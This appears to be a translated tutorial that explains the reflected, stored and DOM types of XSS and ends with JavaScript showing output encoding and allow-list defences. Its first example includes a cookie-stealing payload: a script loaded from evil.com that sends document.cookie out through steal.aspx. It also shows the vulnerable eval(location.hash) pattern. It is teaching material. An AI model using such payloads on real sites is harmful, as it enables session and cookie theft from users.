- Cross-site scripting attacks (XSS)
XSS happens in the target user's browser, on the target site: while the browser renders the HTML document, script that the page author never intended to run gets executed.
The emphasis in "cross-site scripting" is not on "cross-site" but on "scripting".
Simple example:
The page xss1.html contains this piece of JavaScript:
<script>eval(location.hash.substr(1));</script>
Open xss1.html in your browser and append #alert(1) to the URL, for example file:///C:/Users/Jie/Desktop/3.html#alert(1).
The browser then pops up an alert box showing 1.
Of course, attackers do not stop at popping up alert boxes; they use the vulnerability to obtain your cookie and other useful information, for example by replacing #alert(1) with #document.write("<script src='http://www.evil.com/xss.js'></script>")
The code of that xss.js is:
new Image().src = "http://www.evil.com/steal.aspx?data=" + escape(document.cookie);
The server-side steal.aspx page then reads the value of the data parameter, which carries the victim's cookie.
You may ask: who would be foolish enough to write JavaScript like this on their own page? First, understand that this code was not written into the page by its developer; it was injected into the page later. How is it injected? That is what the types of XSS attack are about.
- XSS attacks are generally classified as reflected (non-persistent), stored (persistent), and DOM XSS
1. Reflected type
The page accepts the user's input and submits it to the server; the server includes the XSS code in its response when it processes that content, and the browser finally parses it. Input -> server-side processing -> client-side execution: this is the reflection process.
For example: the server-side code reads the x parameter from the URL xss.aspx?x=<script>alert(1)</script> and outputs it directly into the page. That is reflected XSS.
2. Stored type
Because modern web pages are generated dynamically from database content and then returned to the browser as HTML, stored XSS code is kept directly on the server, and the attack fires when a user visits the page that contains it. Such XSS code usually enters at a place that accepts user input without effective defenses. For example, on a forum the attacker posts a message board entry containing an XSS payload; the message is saved in the backend database, and the next time any user views the message board, the XSS code returned from the backend attacks that user's information.
3. DOM XSS
The difference between DOM XSS and reflected or stored XSS is that DOM XSS does not need to pass through server-side processing; the XSS is triggered by the browser's own DOM handling.
For example, the first example at the beginning of this article is DOM XSS.
The main defenses against XSS are: do not trust user input, validate user input, and HTML-encode user input wherever it is output.
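As an added example (not code from the original article), the defense just described applied in JavaScript to both the reflected xss.aspx?x= case and the DOM location.hash case: the raw interpolation beside its HTML-encoded form, and an allow-list lookup in place of eval(location.hash). The function names and the tab list are my own assumptions.

```javascript
// Added example, not from the original article. Runs under Node.js;
// no real page or server is involved.

// HTML-encode the characters that let untrusted text break out of an HTML
// text node or attribute value. Encoding on output is the article's defense.
function htmlEncode(input) {
  return String(input).replace(/[&<>"'`]/g, (ch) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "`": "&#x60;",
  })[ch]);
}

// Reflected case: the server echoes the x parameter into the page.
// Vulnerable version, kept only to show the difference: raw interpolation.
function renderReflectedUnsafe(x) {
  return `<p>You searched for: ${x}</p>`;
}

// Hardened version: same template, but x is encoded before insertion.
function renderReflectedSafe(x) {
  return `<p>You searched for: ${htmlEncode(x)}</p>`;
}

// DOM case: instead of eval(location.hash.substr(1)), treat the fragment as
// data. Only values from a fixed allow-list are acted on; anything else,
// including a malformed percent-encoding, falls back to the default tab.
const ALLOWED_TABS = new Set(["home", "profile", "settings"]); // assumed list
function tabFromHash(hash) {
  let value;
  try {
    value = decodeURIComponent(String(hash).replace(/^#/, ""));
  } catch (e) {
    return "home";
  }
  return ALLOWED_TABS.has(value) ? value : "home";
}

// Constructed sample inputs, taken from the article's own payloads.
const REFLECTED_PAYLOAD = "<script>alert(1)</script>";
const HASH_PAYLOAD = "#alert(1)";

if (typeof require !== "undefined" && require.main === module) {
  console.log(renderReflectedUnsafe(REFLECTED_PAYLOAD)); // script tag intact
  console.log(renderReflectedSafe(REFLECTED_PAYLOAD));   // &lt;script&gt;...
  console.log(tabFromHash(HASH_PAYLOAD));                // "home"
}
```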